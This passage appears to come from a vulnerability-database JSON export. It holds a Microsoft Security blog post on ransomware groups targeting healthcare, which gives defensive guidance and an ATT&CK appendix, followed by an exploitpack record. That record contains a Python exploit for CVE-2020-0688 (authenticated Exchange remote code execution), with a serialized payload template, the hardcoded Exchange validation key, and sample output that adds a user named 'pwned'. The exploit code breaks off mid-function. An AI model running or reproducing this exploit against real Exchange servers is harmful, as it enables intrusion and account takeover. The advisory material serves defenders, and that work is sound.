Task](<https://attack.mitre.org/techniques/T1053/>)\n\nCollection\n\n * [Data From Local System](<https://attack.mitre.org/techniques/T1005/>)\n * [Data Staged](<https://attack.mitre.org/techniques/T1074/>)\n * [Email Collection](<https://attack.mitre.org/techniques/T1114/>)\n\nCommand and control\n\n * [Remote File Copy](<https://attack.mitre.org/techniques/T1105/>)\n * [Connection Proxy](<https://attack.mitre.org/techniques/T1090/>)\n\nExfiltration\n\n * [Data Compressed](<https://attack.mitre.org/techniques/T1002/>)\n * [Exfiltration Over Command and Control Channel](<https://attack.mitre.org/techniques/T1041/>)\n\n \n\nThe post [Defending Exchange servers under attack](<https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/>) appeared first on [Microsoft Security.", "modified": "2020-06-24T16:00:40", "published": "2020-06-24T16:00:40", "id": "MSSECURE:748E6D0B920B699D6D088D0AD4422C46", "href": "https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/", "type": "mssecure", "title": "Defending Exchange servers under attack", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-30T23:04:13", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-10189"], "description": "At a time when remote work is becoming universal and the strain on SecOps, especially in healthcare and critical industries, has never been higher, ransomware actors are unrelenting, continuing their normal operations.\n\nMultiple ransomware groups that have been accumulating access and maintaining persistence on target networks for several months activated dozens of ransomware deployments in the first two weeks of April 2020. So far the attacks have affected aid organizations, medical billing companies, manufacturing, transport, government institutions, and educational software providers, showing that these ransomware groups give little regard to the critical services they impact, global crisis notwithstanding. These attacks, however, are not limited to critical services, so organizations should be vigilant for signs of compromise.\n\nThe ransomware deployments in this two-week period appear to cause a slight uptick in the volume of ransomware attacks. However, Microsoft security intelligence as well as forensic data from relevant incident response engagements by Microsoft Detection and Response Team (DART) showed that many of the compromises that enabled these attacks occurred earlier. Using an attack pattern typical of [human-operated ransomware](<https://aka.ms/human-operated-ransomware>) campaigns, attackers have compromised target networks for several months beginning earlier this year and have been waiting to monetize their attacks by deploying ransomware when they would see the most financial gain.\n\nMany of these attacks started with the exploitation of vulnerable internet-facing network devices; others used brute force to compromise RDP servers. The attacks delivered a wide range of payloads, but they all used the same techniques observed in human-operated ransomware campaigns: credential theft and lateral movement, culminating in the deployment of a ransomware payload of the attacker\u2019s choice. Because the ransomware infections are at the tail end of protracted attacks, defenders should focus on hunting for signs of adversaries performing credential theft and lateral movement activities to prevent the deployment of ransomware.\n\nIn this blog, we share our in-depth analysis of these ransomware campaigns. Below, we will cover:\n\n * Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n * A motley crew of ransomware payloads\n * Immediate response actions for active attacks\n * Building security hygiene to defend networks against human-operated ransomware\n * Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWe have included additional technical details including hunting guidance and recommended prioritization for security operations (SecOps).\n\n## Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n\nWhile the recent attacks deployed various ransomware strains, many of the campaigns shared infrastructure with previous ransomware campaigns and used the same techniques commonly observed in human-operated ransomware attacks.\n\nIn stark contrast to attacks that deliver ransomware via email\u2014which tend to unfold much faster, with ransomware deployed within an hour of initial entry\u2014the attacks we saw in April are similar to the Doppelpaymer ransomware campaigns from 2019, where attackers gained access to affected networks months in advance. They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware.\n\nTo gain access to target networks, the recent ransomware campaigns exploited internet-facing systems with the following weaknesses:\n\n * Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication (MFA)\n * Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak passwords\n * Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers\n * Citrix Application Delivery Controller (ADC) systems affected by [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)\n * Pulse Secure VPN systems affected by [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nApplying security patches for internet-facing systems is critical in preventing these attacks. It\u2019s also important to note that, although Microsoft security researchers have not observed the recent attacks exploiting the following vulnerabilities, historical signals indicate that these campaigns may eventually exploit them to gain access, so they are worth reviewing: [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>), [CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>).\n\nLike many breaches, attackers employed credential theft, lateral movement capabilities using common tools, including Mimikatz and Cobalt Strike, network reconnaissance, and data exfiltration. In these specific campaigns, the operators gained access to highly privileged administrator credentials and were ready to take potentially more destructive action if disturbed. On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt. In addition, while only a few of these groups gained notoriety for selling data, almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not advertised or sold yet.\n\nAs with all human-operated ransomware campaigns, these recent attacks spread throughout an environment affecting email identities, endpoints, inboxes, applications, and more. Because it can be challenging even for experts to ensure complete removal of attackers from a fully compromised network, it\u2019s critical that vulnerable internet-facing systems are proactively patched and mitigations put in place to reduce the risk from these kinds of attacks.\n\n## A motley crew of ransomware payloads\n\nWhile individual campaigns and ransomware families exhibited distinct attributes as described in the sections below, these human-operated ransomware campaigns tended to be variations on a common attack pattern. They unfolded in similar ways and employed generally the same attack techniques. Ultimately, the specific ransomware payload at the end of each attack chain was almost solely a stylistic choice made by the attackers.\n\n\n\n### RobbinHood ransomware\n\nRobbinHood ransomware operators gained some attention for [exploiting vulnerable drivers](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) late in their attack chain to turn off security software. However, like many other human-operated ransomware campaigns, they typically start with an RDP brute-force attack against an exposed asset. They eventually obtain privileged credentials, mostly local administrator accounts with shared or common passwords, and service accounts with domain admin privileges. RobbinHood operators, like Ryuk and other well-publicized ransomware groups, leave behind new local and Active Directory user accounts, so they can regain access after their malware and tools have been removed.\n\n### Vatet loader\n\nAttackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.\n\nThe group behind this tool appears to be particularly intent on targeting hospitals, as well as aid organizations, insulin providers, medical device manufacturers, and other critical verticals. They are one of the most prolific ransomware operators during this time and have caused dozens of cases.\n\nUsing Vatet and Cobalt Strike, the group has delivered various ransomware payloads. More recently, they have been deploying in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families. To access target networks, they exploit [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>), brute force RDP endpoints, and send email containing .lnk files that launch malicious PowerShell commands. Once inside a network, they steal credentials, including those stored in the Credential Manager vault, and move laterally until they gain domain admin privileges. The group has been observed exfiltrating data prior to deploying ransomware.\n\n### NetWalker ransomware\n\nNetWalker campaign operators gained notoriety for targeting hospitals and healthcare providers with emails claiming to provide information about COVID-19. These emails also delivered NetWalker ransomware directly as a .vbs attachment, a technique that has gained media attention. However, the campaign operators also compromised networks using misconfigured IIS-based applications to launch Mimikatz and steal credentials, which they then used to launch PsExec, and eventually deploying the same NetWalker ransomware.\n\n### PonyFinal ransomware\n\nThis Java-based ransomware had been considered a novelty, but the campaigns deploying PonyFinal weren\u2019t unusual. Campaign operators compromised internet-facing web systems and obtained privileged credentials. To establish persistence, they used PowerShell commands to launch the system tool mshta.exe and set up a reverse shell based on a common PowerShell attack framework. They also used legitimate tools, such as Splashtop, to maintain remote desktop connections.\n\n### Maze ransomware\n\nOne of the first ransomware campaigns to make headlines for selling stolen data, Maze continues to target technology providers and public services. Maze has a history of going after managed service providers (MSPs) to gain access to the data and networks of MSP customers.\n\nMaze has been delivered via email, but campaign operators have also deployed Maze to networks after gaining access using common vectors, such as RDP brute force. Once inside a network, they perform credential theft, move laterally to access resources and exfiltrate data, and then deploy ransomware.\n\nIn a recent campaign, Microsoft security researchers tracked Maze operators establishing access through an internet-facing system by performing RDP brute force against the local administrator account. Using the brute-forced password, campaign operators were able to move laterally because built-in administrator accounts on other endpoints used the same passwords.\n\nAfter gaining control over a domain admin account through credential theft, campaign operators used Cobalt Strike, PsExec, and a plethora of other tools to deploy various payloads and access data. They established fileless persistence using scheduled tasks and services that launched PowerShell-based remote shells. They also turned on Windows Remote Management for persistent control using stolen domain admin privileges. To weaken security controls in preparation for ransomware deployment, they manipulated various settings through Group Policy.\n\n### REvil ransomware\n\nPossibly the first ransomware group to take advantage of the network device vulnerabilities in Pulse VPN to steal credentials to access networks, REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers \u2013 and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments. REvil attacks are differentiated in their uptake of new vulnerabilities, but their techniques overlap with many other groups, relying on credential theft tools like Mimikatz once in the network and performing lateral movement and reconnaissance with tools like PsExec.\n\n### Other ransomware families\n\nOther ransomware families used in human-operated campaigns during this period include:\n\n * Paradise, which used to be distributed directly via email but is now used in human-operated ransomware attacks\n * RagnarLocker, which is deployed by a group that heavily uses RDP and Cobalt Strike with stolen credentials\n * MedusaLocker, which is possibly deployed via existing Trickbot infections\n * LockBit, which is distributed by operators that use the publicly available penetration testing tool CrackMapExec to move laterally\n\n## Immediate response actions for active attacks\n\nWe highly recommend that organizations immediately check if they have any alerts related to these ransomware attacks and prioritize investigation and remediation. Malicious behaviors relevant to these attacks that defenders should pay attention to include:\n\n * Malicious PowerShell, Cobalt Strike, and other penetration-testing tools that can allow attacks to blend in as benign red team activities\n * Credential theft activities, such as suspicious access to Local Security Authority Subsystem Service (LSASS) or suspicious registry modifications, which can indicate new attacker payloads and tools for stealing credentials\n * Any tampering with a security event log, forensic artifact such as the USNJournal, or a security agent, which attackers do to evade detections and to erase chances of recovering data\n\nCustomers using [Microsoft Defender Advanced Threat Protection (ATP)](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>) can consult a companion [threat analytics](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/threat-analytics>) report for more details on relevant alerts, as well as advanced hunting queries. Customers subscribed to the [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) service can also refer to the [targeted attack notification](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts#targeted-attack-notification>), which has detailed timelines of attacks, recommended mitigation steps for disrupting attacks, and remediation advice.\n\nIf your network is affected, perform the following scoping and investigation activities immediately to understand the impact of this breach. Using indicators of compromise (IOCs) alone to determine impact from these threats is not a durable solution, as most of these ransomware campaigns employ \u201cone-time use\u201d infrastructure for campaigns, and often change their tools and systems once they determine the detection capabilities of their targets. Detections and mitigations should concentrate on holistic behavioral based hunting where possible, and hardening infrastructure weaknesses favored by these attackers as soon as possible.\n\n### Investigate affected endpoints and credentials\n\nInvestigate endpoints affected by these attacks and identify all the credentials present on those endpoints. Assume that these credentials were available to attackers and that all associated accounts are compromised. Note that attackers can not only dump credentials for accounts that have logged on to interactive or RDP sessions, but can also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry.\n\n * For endpoints onboarded to [Microsoft Defender ATP](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>), use advanced hunting to identify accounts that have logged on to affected endpoints. The threat analytics report contains a hunting query for this purpose.\n * Otherwise, check the Windows Event Log for post-compromise logons\u2014those that occur after or during the earliest suspected breach activity\u2014with event ID 4624 and logon type 2 or 10. For any other timeframe, check for logon type 4 or 5.\n\n### Isolate compromised endpoints\n\nIsolate endpoints that have command-and-control beacons or have been lateral movement targets. Locate these endpoints using advanced hunting queries or other methods of directly searching for related IOCs. [Isolate machines](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts#isolate-machines-from-the-network>) using Microsoft Defender ATP, or use other data sources, such as NetFlow, and search through your SIEM or other centralized event management solutions. Look for lateral movement from known affected endpoints.\n\n### Address internet-facing weaknesses\n\nIdentify perimeter systems that attackers might have utilized to access your network. You can use a public scanning interface, such as [_shodan.io_](<https://www.shodan.io/>), to augment your own data. Systems that should be considered of interest to attackers include:\n\n * RDP or Virtual Desktop endpoints without MFA\n * Citrix ADC systems affected by CVE-2019-19781\n * Pulse Secure VPN systems affected by CVE-2019-11510\n * Microsoft SharePoint servers affected by CVE-2019-0604\n * Microsoft Exchange servers affected by CVE-2020-0688\n * Zoho ManageEngine systems affected by CVE-2020-10189\n\nTo further reduce organizational exposure, Microsoft Defender ATP customers can use the [Threat and Vulnerability Management (TVM)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations. TVM allows security administrators and IT administrators to collaborate seamlessly to remediate issues.\n\n### Inspect and rebuild devices with related malware infections\n\nMany ransomware operators enter target networks through existing infections of malware like Emotet and Trickbot. These malware families, traditionally considered to be banking trojans, have been used to deliver all kinds of payloads, including persistent implants. Investigate and remediate any known infections and consider them possible vectors for sophisticated human adversaries. Ensure that you check for exposed credentials, additional payloads, and lateral movement prior to rebuilding affected endpoints or resetting passwords.\n\n## Building security hygiene to defend networks against human-operated ransomware\n\nAs ransomware operators continue to compromise new targets, defenders should proactively assess risk using all available tools. You should continue to enforce proven preventive solutions\u2014credential hygiene, minimal privileges, and host firewalls\u2014to stymie these attacks, which have been consistently observed taking advantage of security hygiene issues and over-privileged credentials.\n\nApply these measures to make your network more resilient against new breaches, reactivation of dormant implants, or lateral movement:\n\n * Randomize local administrator passwords using a tool such as LAPS.\n * Apply [Account Lockout Policy](<https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/account-lockout-policy>).\n * Ensure good perimeter security by patching exposed systems. Apply mitigating factors, such as MFA or vendor-supplied mitigation guidance, for vulnerabilities.\n * Utilize [host firewalls to limit lateral movement](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>). Preventing endpoints from communicating on TCP port 445 for SMB will have limited negative impact on most networks, but can significantly disrupt adversary activities.\n * Turn on cloud-delivered protection for Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Follow standard guidance in the [security baselines](<https://techcommunity.microsoft.com/t5/microsoft-security-baselines/bg-p/Microsoft-Security-Baselines>) for Office and Office 365 and the Windows security baselines. Use [Microsoft Secure Score](<https://docs.microsoft.com/en-us/microsoft-365/security/mtp/microsoft-secure-score-preview>) assesses to measures security posture and get recommended improvement actions, guidance, and control.\n * Turn on [tamper protection](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Tamper-protection-now-generally-available-for-Microsoft-Defender/ba-p/911482>) features to prevent attackers from stopping security services.\n * Turn on [attack surface reduction rules](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>), including rules that can block ransomware activity: \n * Use advanced protection against ransomware\n * Block process creations originating from PsExec and WMI commands\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n\nFor additional guidance on improving defenses against human-operated ransomware and building better security posture against cyberattacks in general, read [Human-operated ransomware attacks: A preventable disaster](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n\n## Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWhat we\u2019ve learned from the increase in ransomware deployments in April is that attackers pay no attention to the real-world consequences of disruption in services\u2014in this time of global crisis\u2014that their attacks cause.\n\nHuman-operated ransomware attacks represent a different level of threat because adversaries are adept at systems administration and security misconfigurations and can therefore adapt to any path of least resistance they find in a compromised network. If they run into a wall, they try to break through. And if they can\u2019t break through a wall, they\u2019ve shown that they can skillfully find other ways to move forward with their attack. As a result, human-operated ransomware attacks are complex and wide-reaching. No two attacks are exactly the same.\n\n[Microsoft Threat Protections (MTP)](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides coordinated defenses that uncover the complete attack chain and help block sophisticated attacks like human-operated ransomware. MTP combines the capabilities of multiple Microsoft 365 security services to orchestrate protection, prevention, detection, and response across endpoints, email, identities, and apps.\n\nThrough built-in intelligence, automation, and integration, MTP can block attacks, eliminate their persistence, and auto-heal affected assets. It correlates signals and consolidates alerts to help defenders prioritize incidents for investigation and response. MTP also provides a unique cross-domain hunting capability that can further help defenders identify attack sprawl and get org-specific insights for hardening defenses.\n\nMicrosoft Threat Protection is also part of a [chip-to-cloud security approach](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) that combines threat defense on the silicon, operating system, and cloud. Hardware-backed security features on Windows 10 like address space layout randomization (ASLR), Control Flow Guard (CFG), and others harden the platform against many advanced threats, including ones that take advantage of vulnerable kernel drivers. These platform security features seamlessly integrate with Microsoft Defender ATP, providing end-to-end security that starts from a strong hardware root of trust. On [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers>) these mitigations are enabled by default.\n\nWe continue to work with our customers, partners, and the research community to track human-operated ransomware and other sophisticated attacks. For dire cases customers can use available services like the [Microsoft Detection and Response (DART) team](<https://www.microsoft.com/security/blog/microsoft-detection-and-response-team-dart-blog-series/>) to help investigate and remediate.\n\n \n\n_Microsoft Threat Protection Intelligence Team_\n\n \n\n## Appendix: MITRE ATT&amp;CK techniques observed\n\nHuman-operated ransomware campaigns employ a broad range of techniques made possible by attacker control over privileged domain accounts. The techniques listed here are techniques commonly used during attacks against healthcare and critical services in April 2020.\n\nCredential access\n\n * [T1003 Credential Dumping](<https://attack.mitre.org/techniques/T1003/>) | Use of LaZagne, Mimikatz, LsaSecretsView, and other credential dumping tools and exploitation of [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) on vulnerable endpoints\n\nPersistence\n\n * [T1084 Windows Management Instrumentation Event Subscription](<https://attack.mitre.org/techniques/T1084/>) | WMI event subscription\n * [T1136 Create Account](<https://attack.mitre.org/techniques/T1136/>) | Creation of new accounts for RDP\n\nCommand and control\n\n * [T1043 Commonly Used Port](<https://attack.mitre.org/techniques/T1043/>) | Use of port 443\n\nDiscovery\n\n * [T1033 System Owner/User Discovery](<https://attack.mitre.org/techniques/T1033/>) | Various commands\n * [T1087 Account Discovery](<https://attack.mitre.org/techniques/T1087/>) | LDAP and AD queries and other commands\n * [T1018 Remote System Discovery](<https://attack.mitre.org/techniques/T1018/>) | Pings, qwinsta, and other tools and commands\n * [T1482 Domain Trust Discovery](<https://attack.mitre.org/techniques/T1482/>) | Domain trust enumeration using Nltest\n\nExecution\n\n * [T1035 Service Execution](<https://attack.mitre.org/techniques/T1035/>) | Service registered to run CMD (as ComSpec) and PowerShell commands\n\nLateral movement\n\n * [T1076 Remote Desktop Protocol](<https://attack.mitre.org/techniques/T1076/>) | Use of RDP to reach other machines in the network\n * [T1105 Remote File Copy](<https://attack.mitre.org/techniques/T1105/>) | Lateral movement using WMI and PsExec\n\nDefense evasion\n\n * [T1070 Indicator Removal on Host](<https://attack.mitre.org/techniques/T1070/>) | Clearing of event logs using wevutil, removal of USNJournal using fsutil, and deletion of slack space on drive using cipher.exe\n * [T1089 Disabling Security Tools](<https://attack.mitre.org/techniques/T1089/>) | Stopping or tampering with antivirus and other security using ProcessHacker and exploitation of vulnerable software drivers\n\nImpact\n\n * [T1489 Service Stop](<https://attack.mitre.org/techniques/T1489/>) | Stopping of services prior to encryption\n * [T1486 Data Encrypted for Impact](<https://attack.mitre.org/techniques/T1486/>) | Ransomware encryption\n\nThe post [Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) appeared first on [Microsoft Security.", "modified": "2020-04-28T16:00:49", "published": "2020-04-28T16:00:49", "id": "MSSECURE:E3C8B97294453D962741782EC959E79C", "href": "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "type": "mssecure", "title": "Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T20:40:18", "description": "\nMicrosoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution", "edition": 1, "published": "2020-03-02T00:00:00", "title": "Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-0688"], "modified": "2020-03-02T00:00:00", "id": "EXPLOITPACK:71F27F0B85E2B8F7A6B9272A3136DA05", "href": "", "sourceData": "# Exploit Title: Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution\n# Date: 2020-02-28\n# Exploit Author: Photubias\n# Vendor Advisory: [1] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688\n# [2] https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys\n# Vendor Homepage: https://www.microsoft.com\n# Version: MS Exchange Server 2010 SP3 up to 2019 CU4\n# Tested on: MS Exchange 2019 v15.2.221.12 running on Windows Server 2019\n# CVE: CVE-2020-0688\n\n#! /usr/bin/env python\n# -*- coding: utf-8 -*- \n''' \n\n \n\tCopyright 2020 Photubias(c)\n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see <http://www.gnu.org/licenses/>.\n \n File name CVE-2020-0688-Photubias.py\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\n\n This is a native implementation without requirements, written in Python 2.\n Works equally well on Windows as Linux (as MacOS, probably ;-)\n Reverse Engineered Serialization code from https://github.com/pwntester/ysoserial.net\n\n Example Output:\n CVE-2020-0688-Photubias.py -t https://10.11.12.13 -u sean -c \"net user pwned pwned /add\"\n [+] Login worked\n [+] Got ASP.NET Session ID: 83af2893-6e1c-4cee-88f8-b706ebc77570\n [+] Detected OWA version number 15.2.221.12\n [+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable!\n [+] All looks OK, ready to send exploit (net user pwned pwned /add)? [Y/n]:\n [+] Got Payload: /wEy0QYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADzBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIm5ldCB1c2VyIHB3bmVkIHB3bmVkIC9hZGQiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5PgvjXlpQBwdP741icUH6Wivr7TlI6g==\n Sending now ...\n'''\nimport urllib2, urllib, base64, binascii, hashlib, hmac, struct, argparse, sys, cookielib, ssl, getpass\n\n## STATIC STRINGS\n# This string acts as a template for the serialization (contains \"###payload###\" to be replaced and TWO size locations)\nstrSerTemplate = base64.b64decode('/wEy2gYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAAD8BDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIiMjI3BheWxvYWQjIyMiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5Pgs=')\n# This is a key installed in the Exchange Server, it is changeable, but often not (part of the vulnerability)\nstrSerKey = binascii.unhexlify('CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF')\n\ndef convertInt(iInput, length): \n return struct.pack(\"<I\" , int(iInput)).encode('hex')[:length]\n\ndef getYsoserialPayload(sCommand, sSessionId):\n ## PART1 of the payload to hash\n strPart1 = strSerTemplate.replace('###payload###', sCommand)\n ## Fix the length fields\n #print(binascii.hexlify(strPart1[3]+strPart1[4])) ## 'da06' > '06da' (0x06b8 + len(sCommand))\n #print(binascii.hexlify(strPart1[224]+strPart1[225])) ## 'fc04' > '04fc' (0x04da + len(sCommand))\n strLength1 = convertInt(0x06b8 + len(sCommand),4)\n strLength2 = convertInt(0x04da + len(sCommand),4)\n strPart1 = strPart1[:3] + binascii.unhexlify(strLength1) + strPart1[5:]\n strPart1 = strPart1[:224] + binascii.unhexlify(strLength2) + strPart1[226:]\n \n ## PART2 of the payload to hash\n strPart2 = '274e7bb9'\n for v in sSessionId: strPart2 += binascii.hexlify(v)+'00'\n strPart2 = binascii.unhexlify(strPart2)\n \n strMac = hmac.new(strSerKey, strPart1 + strPart2, hashlib.sha1).hexdigest()\n strResult = base64.b64encode(strPart1 + binascii.unhexlify(strMac))\n return strResult\n\ndef verifyLogin(sTarget, sUsername, sPassword, oOpener, oCookjar):\n if not sTarget[-1:] == '/': sTarget += '/'\n ## Verify Login\n lPostData = {'destination' : sTarget, 'flags' : '4', 'forcedownlevel' : '0', 'username' : sUsername, 'password' : sPassword, 'passwordText' : '', 'isUtf8' : '1'}\n try: sResult = oOpener.open(urllib2.Request(sTarget + 'owa/auth.owa', data=urllib.urlencode(lPostData), headers={'User-Agent':'Python'})).read()\n except: print('[!] Error, ' + sTarget + ' not reachable')\n bLoggedIn = False\n for cookie in oCookjar:\n if cookie.name == 'cadata': bLoggedIn = True\n if not bLoggedIn:\n print('[-] Login Wrong, too 